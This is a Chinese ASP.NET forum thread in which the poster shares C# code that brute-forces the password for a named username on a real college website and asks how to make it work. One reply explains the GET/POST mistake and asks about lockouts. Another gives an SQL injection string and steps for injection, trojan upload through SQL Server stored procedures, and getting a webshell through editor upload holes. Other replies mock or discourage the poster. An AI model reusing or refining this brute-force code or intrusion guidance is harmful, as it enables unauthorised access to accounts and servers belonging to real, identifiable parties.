当前位置: 代码迷 >> ASP.NET >> 破解网站-> 请支招!解决方案
  详细解决方案

破解网站-> 请支招!解决方案

热度:9140   发布时间:2013-02-25 00:00:00.0
破解网站---> 请支招!!!
我想试试能不能破解网站:
分享一下我的代码,谁有更好方法,不仿提提
下面是我的C# code:
richTextBox1 ===>展示页面内容。
txtURL ===>j 是有于显示密码的。
下面是被攻网站描述:
基本
  该网站有图片: images/login.gif 作为登录按钮!
  用户名的输入控件:<input id='textfield' ...
  密码 的输入控件:<input id='textfield2' ...
登录成功后的行为:
  如果登录成功 会定向到 用户信息页,就没有 登录按钮 了,
--->
C# code
private void txtJD_Click(object sender, EventArgs e){    string JD = @"http://www.gdmec.com?textfield=06100511";// &textfield2=0511    int i=0;    for (int j = 1; j <= 10; j++)    {        int min = (int)(1 * Math.Pow(10, (double)j));        int max = (int)(2 * Math.Pow(10, (double)j));        for (i = min; i < max; i++)        {            WebClient wc = new WebClient();            wc.Encoding = Encoding.UTF8;            string url = JD + "&textfield2=" + i.ToString().Substring(1, j);            string DownStr = wc.DownloadString(url);            txtURL.Text = i.ToString().Substring(1, j);            if (!DownStr.Contains("images/login.gif"))            {                richTextBox1.Text = DownStr;                txtURL.Text = i.ToString().Substring(1, j);                break;            }        }    }    }

我让 此程序运行一个下午都没有找到 用户名:06100511 的密码。
谁知乍回事。
谢谢提点。

------解决方案--------------------------------------------------------
這種事情,,哎哎,不敢
------解决方案--------------------------------------------------------
在url后的是 GET模式。

如果是aspx网站默认的是 POST模式。

它的网站没有做验证码和错误次数限制?
------解决方案--------------------------------------------------------
lz 语言 颜色好丰富啊
------解决方案--------------------------------------------------------
探讨
高手们,你们是怎么破解网站的?
不防说说啊。
我这个方法是不是人什么漏洞啊?
指教一下吧!

------解决方案--------------------------------------------------------
灰常精彩的代码
------解决方案--------------------------------------------------------
SQL 注入有很多种,0'or'0'='0 是其中的一种
还有可以通过url.aspx?id=10这种页面,如果页面对于输入的参数没有严格限定类型,而且sql语句又是通过拼接的方式的,就可以直接注入,注入方法如下
1、在地址栏输入url.aspx?id=10' 加单引号,这时页面会返回错误页面将会暴出使用何种数据库,这一步也是用来检查是否存在注入漏洞的,如果对方关闭了详细错误信息还可以通过url.aspx?id=10 and 1=1等来判断
2、根据对方使用的数据库类型在构造注入的sql语句,如果是sql server,可以这样构造
url.aspx?id=10;sql server的系统存储过程上传木马--  前提是对方使用sa作为数据库连接用户
其实这些现在都有现成的工具去做

编辑器的上传漏洞 这个就是利用大部分网站使用的富文本编辑器存在的上传漏洞,上传木马文件到服务器上,再通过这些木马控制服务器获得服务器的管理权限,

webshell 就是通过上面的sql注入或上传漏洞,获得了服务器的控件权限,最终拿到服务器的管理账号密码,想随便改网站的内容都可以了
------解决方案--------------------------------------------------------
心思用对地方 。。

------解决方案--------------------------------------------------------
LZ真会扯
------解决方案--------------------------------------------------------
看着你写的代码就知道你有多愚蠢

如果你要做坏人 那么请记住坏人的第一天职业守则:不要把你想害的人当白痴,除非你自己是白痴。

想学破解?很简单。
三个东西学好了,你根本不需要人教:数学建模 编程思想 人类心理学

其他的 别想了
没人会告诉你怎么去破解别人的网站 就算会他们也不会告诉你——除非他跟你一样愚蠢

------解决方案--------------------------------------------------------
破解网站大部分是找漏洞,比如上传的漏洞,可以上传图片(木马),过滤不严格的就可以使用工具来修改后缀,执行木马得到webshell 其实这些都有工具可以用,不过没有什么意思,还是走正道吧 嘿嘿!
------解决方案--------------------------------------------------------
探讨
破解网站大部分是找漏洞,比如上传的漏洞,可以上传图片(木马),过滤不严格的就可以使用工具来修改后缀,执行木马得到webshell 其实这些都有工具可以用,不过没有什么意思,还是走正道吧 嘿嘿!

------解决方案--------------------------------------------------------
乌鸦飞过~~~~~ 大家淡定
------解决方案--------------------------------------------------------
lz你这样以后回你贴的人会越来越少。
  相关解决方案